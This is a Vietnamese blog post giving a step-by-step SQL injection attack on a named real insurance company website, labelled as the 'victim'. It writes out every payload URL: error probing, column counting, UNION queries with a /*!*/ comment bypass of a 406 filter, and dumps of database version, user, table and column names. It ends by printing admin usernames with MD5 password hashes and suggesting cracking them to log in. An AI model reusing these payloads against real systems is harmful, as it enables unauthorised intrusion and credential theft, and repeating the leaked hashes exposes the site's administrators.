Bài liên quan
http://baohiemvietlife.com/index.php?page=news&catid=6 => Victim
Start:
(SQLI)
B1: kiểm tra lỗi
Thêm dấu ‘ vào sau query:
http://baohiemvietlife.com/index.php?page=news&catid=6′ =>
Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ”’ at line 1Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ORDER BY Position asc’ at line 1Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ORDER BY Position asc’ at line 1 => lỗi rồi nhé =))
B2: Order by
http://baohiemvietlife.com/index.php?page=news&catid=6 order by 5 => Site bình thường
http://baohiemvietlife.com/index.php?page=news&catid=6 order by 6– – => lỗi rồi
~> số cột lỗi ở đây là 5 cột :))) vì khi order tới 6 site lỗi mà order 5 site lại bình thường nên 6-1=5 :))))
Tiếp nhé
B3: Union để tìm cột lỗi
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION SELECT 1,2,3,4,5– -=>
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Tới đây đã là chuyển sang Bypass rồi đó

(BYPASS)
với not acceptable theo tớ lên gg search thì nó là bypass 406 ==” và các bạn có thể thấy ở cái <title> của trang web đó :))) nó báo là 406 not acceptable

B4: Bypass 406
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION SELECT 1,2,3,4,5– -
ta bypass bằng cách thêm dấu /*!*/ vào đoạn select ta sẽ được:
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION /*!SELECT*/ 1,2,3,4,5– -
hehe :))) hết chặn nhé :)) bạn thấy có số 2 đúng không

B5: get version,user,database…
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION /*!SELECT*/ 1,concat(/*!database(),0x2f,@@version,0x2f,user()*/),3,4,5 from information_schema.tables where tables– -
chú ý: 0x2f là dấu / đã chuyển qua dạng mã hex và ta phải thêm dấu /*!*/ vào concat(database(),0x2f,@@version,0x2f,user()) để bypass ta sẽ được query như trên
verrsion: 5.1.73-cll
database: vietlife_user@localhost
user: vietlife_baohiem
B6: get table
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION /*!SELECT*/ 1,group_concat(/*!table_name*/),3,4,5 from information_schema.tables where /*!table_schema*/=database()– -

B7: get column trong table chứ a infor admin
table chứ a infor admin là: admin
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION /*!SELECT*/ 1,group_concat(/*!column_name*/),3,4,5 from information_schema.columns where /*!table_name*/=0x61646d696e– -
61646d696e là ký tự admin chuyển qua hex

B7: get infor trong column Username,Password
http://baohiemvietlife.com/index.php?page=news&catid=-6 UNION /*!SELECT*/ 1,group_concat(/*!Username,0x2f,Password*/),3,4,5 from admin– -
infor: DangThu/6ed83afc63d3c8da076b4e726f06b0fa,adicon/cf62ed58d18fd413ca4a6fcdb3315efe

B8: crack pass md5 kia và tìm link admin :)) sau đó login thôi :)) nếu may mắn sẽ login được

à tớ có cái query này tận dụng số cột lỗi xuất ra cả version+database+user+và infor:
http://baohiemvietlife.com/index.php?page=news&catid=-null UNION /*!SELECT*/ 1,concat(/*!database(),0x2f,@@version,0x2f,user(),0x2f,Username ,0x2f,Password */),3,4,5 from admin– -

Nguồn caspervn29

Post a Comment

 
Top

Nhận xét mới đăng tải!

Loading…
X